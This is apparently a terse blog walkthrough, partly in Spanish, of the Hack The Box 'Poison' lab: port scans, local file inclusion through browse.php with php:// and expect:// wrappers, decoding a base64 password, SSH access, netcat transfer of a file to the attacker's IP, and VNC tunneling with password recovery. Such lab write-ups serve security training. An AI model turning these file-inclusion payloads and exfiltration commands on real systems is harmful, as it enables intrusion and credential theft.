Cu3rv0x
Poison

Poison


HTB Linux

echo “10.129.1.254 poison.htb” | sudo tee -a /etc/hosts

nmap -sC -sV -O -oA initial 10.129.1.254

nmap -sC -sV -p- -oA full 10.129.1.254

#udp scan nmap -sU -p- -oA udp 10.129.1.254

rustscan —accessible -a poison.htb -r 1-65535 — -sT -sV -sC -Pn

ssh_command.

Vamos a http://10.129.1.254/browse.php?file=listfiles.php

ssh_command.

Vamos a http://10.129.1.254/browse.php?file=pwdbackup.txt

ssh_command.

expect://id

ssh_command.

php://filter/convert.base64-encode/resource=[file-name]

ssh_command.

#!/bin/bash# secret.txt contains encoded text secret=$(<secret.txt)for i in {1..13}; do secret=$(<<<“$secret” base64 —decode) done echo “$secret”

Charix!2#4%6&8(0

ssh_command.

ssh charix@poison.htb

ssh_command.

nc -lvnp 443

nc 10.10.14.135 443 < secret.zip

Vamos a http://10.129.1.254/browse.php?file=/var/log/http-access.log

ps -auxww | grep vnc

ssh_command.

netstat -an | grep LIST

ssh_command.

ssh -L 5000:127.0.0.1:5901 charix@10.129.1.254

ssh_command.

netstat -an |grep LIST

ssh_command.

https://github.com/jeroennijhof/vncpwd $ ./vncpwd ../secret Password: VNCP@$$!

ssh_command.

© 2025 Cu3rv0x